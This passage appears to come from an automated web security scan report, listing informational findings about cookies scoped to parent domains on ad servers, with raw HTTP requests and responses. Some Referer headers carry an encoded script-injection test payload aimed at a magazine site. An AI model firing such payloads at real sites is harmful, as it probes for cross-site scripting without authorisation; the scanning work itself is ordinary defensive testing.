Cookie: uid=N9CZDAH.Q7IPoP; act=a$305#1315313311294_68374606_as3101_clk!1315313297486_68372787_as3103_imp!|; imp=a$le#1316265127425_137664789_as3101_vew|308#1316265127233_137611811_as3107_imp|374#1316221548433_135109402_as3106_imp|305#1315313297486_68372787_as3103_imp|; p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1316276794628_138296936_as3100_imp|374#1316276794628_138296936_as3100_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; Domain=.teracent.net; Expires=Thu, 15-Mar-2012 16:26:34 GMT; Path=/tase
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:26:34 GMT
Content-Length: 2756

resourceServer=http%3A%2F%2Fpcdn.tcgmsrv.net%2Ftase&eventId=1316276794628_138296936_as3100_imp&responseStatus=0&eventUrl=http%3A%2F%2Fadserver.teracent.net%2Ftase%2Fredir%2F1316276794628_138296936_as3
...[SNIP]...
12.56. http://adserver.teracent.net/tase/redir/1316276657094_138127931_as3105_imp/vew  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/redir/1316276657094_138127931_as3105_imp/vew

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tase/redir/1316276657094_138127931_as3105_imp/vew?q=H4sIAAAAAAAAAFWQQWoDMQxFryLJsiyD91plkW1JfITSmWZIoBSGyUwxJZOco3fsIaq02XQlnr78hPX1_r3tCkm0tRtOZXt9HdbxttjQFyBIQVJiQY3W-vLkHaKUNKKIbpwQhZRQMWz-Mv7N5E4RImn0Gnf23A2tPCUBJ847G-5yDISZkbM-cmBMWRB21m7HslwP53We1jZ92nh4PAisrKT2UuapLSX6bkjIe5s7x5RRKVF27B1FQRH29ta66brMRTig7G25jMVdPjT6UIiRchC6O86HU2FhEgbrPh4rIfsnKFpf0G90nEtAgIpaQSpSJawxmYv-nasCZQiiBHXsXcO1XTr7AadrkVNtAQAA&act=vew&idx=[0]&rnd=2034739059&no_ack=1&eventType=countOnCreative&eventOn=creative HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/3125202/PID_1715626_Parent_SkyBridge_Merchant_Dynamic_728x90_noStore.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; act=a$305#1315313311294_68374606_as3101_clk!1315313297486_68372787_as3103_imp!|; imp=a$le#1316276657094_138127931_as3105_imp|374#1316276657094_138127931_as3105_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|

Response

HTTP/1.1 204 No Content
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1316276804635_138297754_as3100_vew|374#1316276797216_138139088_as3105_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|6b15c0af12675c6512b6afb6#|; Domain=.teracent.net; Expires=Thu, 15-Mar-2012 16:26:44 GMT; Path=/tase
Date: Sat, 17 Sep 2011 16:26:44 GMT

12.57. http://adserver.teracent.net/tase/redir/1316277335242_138208257_as3106_imp/vew  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/redir/1316277335242_138208257_as3106_imp/vew

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tase/redir/1316277335242_138208257_as3106_imp/vew?q=H4sIAAAAAAAAAFWPwWrDMAyGX0WSbVkG33XqYdeS-hHGnDW0MAYhTYYZTfsA20NP2XrZSfzSp_-Xvt6_qfV5DwREMUpAZtmZQmQSQkG3-5v53xlvKkAgCVZDp0PeYEeYPPokWj8eDUhGUNDnOrS8jwyG-9TpWk9zdghQUApwQSqEJUStmThoW7b96JiJvAuuACWHyXkuY2_GsbRr1T6jjsdHkvPihUTb_ZSX2_GyztPapk9LGs756fY6rON90aH_b_w4DDzGxAidvuR5svRgT0NEf9C5mowibK-Ryd4kCwjCQd9anW7LnNk75IMu1zHbKQaNBrng0TmRzeNyPGfPERiS_gDhxHWibQEAAA==&act=vew&idx=[0]&rnd=2035415161&no_ack=1&eventType=countOnCreative&eventOn=creative HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/3125202/PID_1715626_Parent_SkyBridge_Merchant_Dynamic_728x90_noStore.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; act=a$305#1315313311294_68374606_as3101_clk!1315313297486_68372787_as3103_imp!|; imp=a$le#1316277335242_138208257_as3106_imp|374#1316277335242_138208257_as3106_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|

Response

HTTP/1.1 204 No Content
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1316278453843_138362726_as3103_vew|374#1316278116134_138322589_as3104_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; Domain=.teracent.net; Expires=Thu, 15-Mar-2012 16:54:13 GMT; Path=/tase
Date: Sat, 17 Sep 2011 16:54:13 GMT

12.58. http://adserver.teracent.net/tase/redir/1316277342661_138301358_as3101_imp/vew  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/redir/1316277342661_138301358_as3101_imp/vew

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tase/redir/1316277342661_138301358_as3101_imp/vew?q=H4sIAAAAAAAAAFWPwWrDMAyGX0WSbVkG33XqYdfS-hHGnDW0MAYhTYoZTQs77bGnbN1hJ_Hp__VL-nr3ny95GtucA6FARL_XqRpGEU4eybAzZAFB2Otbq-NtnjJ7h7zX-TpkQGemwUwueHROZM04H07ZcwSGpH2XgSA6ZgouRtB-ZXSEtsEn0S6jti5vrUsUowRkls3qQSaxw9BtfjX_o_FKAQJJsBp2-lz7lreRwcinPwaPMTHCTtv9mOfb4bxM49LGD62XxwWQLIGCLrU_5afba78M99noOGWHAAWlABekQlhC1OHwmHNevJCoff3vtQKUCIF8KkNnTijtWrVm4qDfZrqS9W0BAAA=&act=vew&idx=[0]&rnd=2035422580&no_ack=1&eventType=countOnCreative&eventOn=creative HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/3125202/PID_1715626_Parent_SkyBridge_Merchant_Dynamic_728x90_noStore.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; act=a$305#1315313311294_68374606_as3101_clk!1315313297486_68372787_as3103_imp!|; imp=a$le#1316277342661_138301358_as3101_imp|374#1316277342661_138301358_as3101_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|

Response

HTTP/1.1 204 No Content
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1316278488979_138303797_as3106_vew|374#1316277335242_138208257_as3106_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; Domain=.teracent.net; Expires=Thu, 15-Mar-2012 16:54:48 GMT; Path=/tase
Date: Sat, 17 Sep 2011 16:54:48 GMT

12.59. http://adserver.teracent.net/tase/redir/1316277704500_138214252_as3105_imp/vew  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/redir/1316277704500_138214252_as3105_imp/vew

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tase/redir/1316277704500_138214252_as3105_imp/vew?q=H4sIAAAAAAAAAFWQwWrDMAyGX0WSbVkGX3bSqYddS-tHGHPW0MIohDQZZiTpq0_detnJfP6lT0jL9fpSM3HQtfaX_Lp99Otwn7XvMhBEx8wYPKK2Lu_thyhGCcgsOyNEJiEUdLu_zP9m_KAAgSTYGw76VvuW95HByKeD9g85OsLk0Sd55uAxJkY4aLuf87ydbus0rm381uH0bHBevJDoe57GNudgsyGiP-pUDaMIm5EMO0MWEISjfrY6bvOU2Tvko87LkM1lRYMVOdvOOZGH43a6ZM8RGJLWr-dISLYEBe0y2o3OU3YIUFAKcEEqhCVENdG_cxWg5CA478rQmcaXtlT9AaQqdOptAQAA&act=vew&idx=[0]&rnd=2035784592&no_ack=1&eventType=countOnCreative&eventOn=creative HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/3125202/PID_1715626_Parent_SkyBridge_Merchant_Dynamic_728x90_noStore.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; act=a$305#1315313311294_68374606_as3101_clk!1315313297486_68372787_as3103_imp!|; imp=a$le#1316277704500_138214252_as3105_imp|374#1316277704500_138214252_as3105_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|

Response

HTTP/1.1 204 No Content
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$6b15c0af7ce39e040b0650aa#|le#1316279025320_138345049_as3106_vew|374#1316277704500_138214252_as3105_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; Domain=.teracent.net; Expires=Thu, 15-Mar-2012 17:03:45 GMT; Path=/tase
Date: Sat, 17 Sep 2011 17:03:44 GMT

12.60. http://adserver.teracent.net/tase/redir/1316277704500_138372278_as3100_imp/vew  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/redir/1316277704500_138372278_as3100_imp/vew

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tase/redir/1316277704500_138372278_as3100_imp/vew?q=H4sIAAAAAAAAAFWQMW7DMAxFr0JSEkUB2jll6Fo4OkJRuTESoChgOHYgFHGy9Ga9WOk2S8f3-UH-z68P-l7rcMpPt7dhHe-LtvsxL7fDeZ2ntU2fOmQgQEeYPPokWjNx0Hp5yJACAQXtM-p4eIjOixcSfalDy8_gMSZG6B4cGSAEnzpd63HODgEKSgEuSIWwhKht2TZFx8wYPGIBSsTOcSpjbyewtGvV1zxP5gyEAhH9XudqGEXYspJhb8gCgrDX91an2zJn9g55r8t1zBbVTKOZnB1xTmTbcT6csucIDEmH_n8Obb31scIUowRklt3WGJnEQqDb_c3874w3ChBI7EUhdPoD_Sqc1m0BAAA=&act=vew&idx=[0]&rnd=2035784583&no_ack=1&eventType=countOnCreative&eventOn=creative HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/3125202/PID_1715626_Parent_SkyBridge_Merchant_Dynamic_728x90_noStore.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; act=a$305#1315313311294_68374606_as3101_clk!1315313297486_68372787_as3103_imp!|; imp=a$le#1316277704500_138214252_as3105_imp|374#1316277704500_138214252_as3105_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|

Response

HTTP/1.1 204 No Content
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1316279024374_138344973_as3106_vew|374#1316277342661_138301358_as3101_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; Domain=.teracent.net; Expires=Thu, 15-Mar-2012 17:03:44 GMT; Path=/tase
Date: Sat, 17 Sep 2011 17:03:43 GMT

12.61. http://adserver.teracent.net/tase/redir/1316277712246_66815854_as3102_imp/vew  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/redir/1316277712246_66815854_as3102_imp/vew

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tase/redir/1316277712246_66815854_as3102_imp/vew?q=H4sIAAAAAAAAAFWPvW7DMAyEX4XUD0UB2jll6FrYGgt0KSrHRgJ0cR27EIo4foC-dOkmSzce73j69PP58rqW4ZyebsdhHbdFhgQG0BqMDl1keU_zVJfkDTIEdK3MRWVgJg0YlZ1KYmCEVj5qmW7LnMhZpFaW65i0S0Ojhqx3aC3z3nHpz8lRAIIodTul5dZf1nla6_QtGlWEYIkIrPUhhxDBRefz2O1ouV6LvJWhpmdwGCIhNDL2D27r2LFh6RJK-XosIXoDxkvt9EYnEwJ7JOLD7iMZ1u-hPdw99-fRrjx4w3rrfSP9pi8Ox35uZOj-I0pJhrys5TQniwAZOQNlNNlgVvtOGwi0yMVGfgGz-pLEdwEAAA==&act=vew&idx=[0]&rnd=2035792327&no_ack=1&eventType=countOnCreative&eventOn=creative HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/3125202/PID_1715626_Parent_SkyBridge_Merchant_Dynamic_728x90_noStore.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; act=a$305#1315313311294_68374606_as3101_clk!1315313297486_68372787_as3103_imp!|; imp=a$le#1316277712246_66815854_as3102_imp|374#1316277712246_66815854_as3102_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|

Response

HTTP/1.1 204 No Content
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1316279029346_138479721_as3100_vew|374#1316277704500_138214252_as3105_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; Domain=.teracent.net; Expires=Thu, 15-Mar-2012 17:03:49 GMT; Path=/tase
Date: Sat, 17 Sep 2011 17:03:49 GMT

12.62. http://adserver.teracent.net/tase/redir/1316278116134_138322589_as3104_imp/vew  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.teracent.net
Path:   /tase/redir/1316278116134_138322589_as3104_imp/vew

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tase/redir/1316278116134_138322589_as3104_imp/vew?q=H4sIAAAAAAAAAFWPMW7DMAxFr0JSIiUB2jl16Fo4OkJROTYSoIvr2IVQxMl9esrSbZaOj_z_k__743Ie7i2_jMdh6XTMQICOMHn0KerY74PgJAEEINa2_h8UoETOmbZMvVm5tGvVaXjkOB99pKhveZnNyoQRAvqDLtUwJIwUKBn2hhIhIhz0vdX5ti5ZvEM56HqdsmWZaDKRY6bkhPaMy3DOXjyJB233U15vw2Vb5q3NX_paR2sFHkMShE7r5-MlSEx7k5pJWLc6nvPz7Thu033VPuPDGASA2afOFKclOwQoGAtIQSqEhYO23vItikKIjCLxaT-AQtFaonv62_nfnezEwEZkP3X6AxhtKpl4AQAA&act=vew&idx=[0]&rnd=2036202258&no_ack=1&eventType=countOnCreative&eventOn=creative HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/3125202/PID_1715626_Parent_SkyBridge_Merchant_Dynamic_728x90_noStore.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; act=a$305#1315313311294_68374606_as3101_clk!1315313297486_68372787_as3103_imp!|; imp=a$le#1316278116134_138322589_as3104_imp|374#1316278116134_138322589_as3104_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|

Response

HTTP/1.1 204 No Content
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1316280438322_138517596_as3104_vew|374#1316277712246_66815854_as3102_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; Domain=.teracent.net; Expires=Thu, 15-Mar-2012 17:27:18 GMT; Path=/tase
Date: Sat, 17 Sep 2011 17:27:18 GMT

12.63. http://amch.questionmarket.com/adsc/d926534/6/43407795/decide.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d926534/6/43407795/decide.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d926534/6/43407795/decide.php?1&noiframe=1 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: linkjumptest=1; LP=1316276716; CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1_43407814-6-1_43624044-35-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us_926534-vu@|M-0_927907-{w@|M-0

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:51:32 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Set-Cookie: CS1=deleted; expires=Fri, 17 Sep 2010 16:51:31 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1_43407799-6-1_43407795-6-1; expires=Wed, 07 Nov 2012 08:51:32 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0_926534-v"@|M-@A; expires=Wed, 07-Nov-2012 08:51:32 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 46
Content-Type: text/javascript

/* b103.dl - Sat Sep 17 00:53:10 EDT 2011 */
;
12.64. http://amch.questionmarket.com/adsc/d926534/6/43407799/decide.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d926534/6/43407799/decide.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d926534/6/43407799/decide.php?1&noiframe=1 HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0; CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1; LP=1316270408; ST=913131_

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:54:57 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Set-Cookie: CS1=deleted; expires=Fri, 17 Sep 2010 16:54:56 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1_43407814-6-1_43624044-35-1ce587bf795690d091ae442f8_43407795-6-68_926534-1-45_43407799-6-1; expires=Wed, 07 Nov 2012 08:54:57 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us_927907-{w@|M-0_926534-[?@|M-0; expires=Wed, 07-Nov-2012 08:54:57 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 46
Content-Type: text/javascript

/* b201.dl - Sat Sep 17 00:53:10 EDT 2011 */
;
12.65. http://amch.questionmarket.com/adsc/d926534/6/43407814/decide.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d926534/6/43407814/decide.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d926534/6/43407814/decide.php?1&noiframe=1 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us; linkjumptest=1; LP=1316276716

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:39:19 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Set-Cookie: CS1=deleted; expires=Fri, 17 Sep 2010 16:39:18 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=43208740-5-1_845473-1-1_912463-21-4_911763-21-5_912550-21-1_912461-21-2_912465-21-1_43977402-2-2_43064321-10-1_43741102-3-1_400008095899-10-1_43407799-6-1_926534-1-42_43407814-6-1; expires=Wed, 07 Nov 2012 08:39:19 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=917157-$MM\M-0_845473-t`m\M-0_908257-~|k^M-f#4_922317-|N'|M-g1_917547-Q#?|M-0_924563-`#?|M-0_913131-y'?|M-0_926534-v"@|M-e2; expires=Wed, 07-Nov-2012 08:39:19 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 46
Content-Type: text/javascript

/* b201.dl - Sat Sep 17 00:53:10 EDT 2011 */
;
12.66. http://amch.questionmarket.com/adsc/d927907/35/43624044/decide.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d927907/35/43624044/decide.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adsc/d927907/35/43624044/decide.php?ord=1316295008 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/index.aspx?template=ads.ascx&topic=other&tile=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
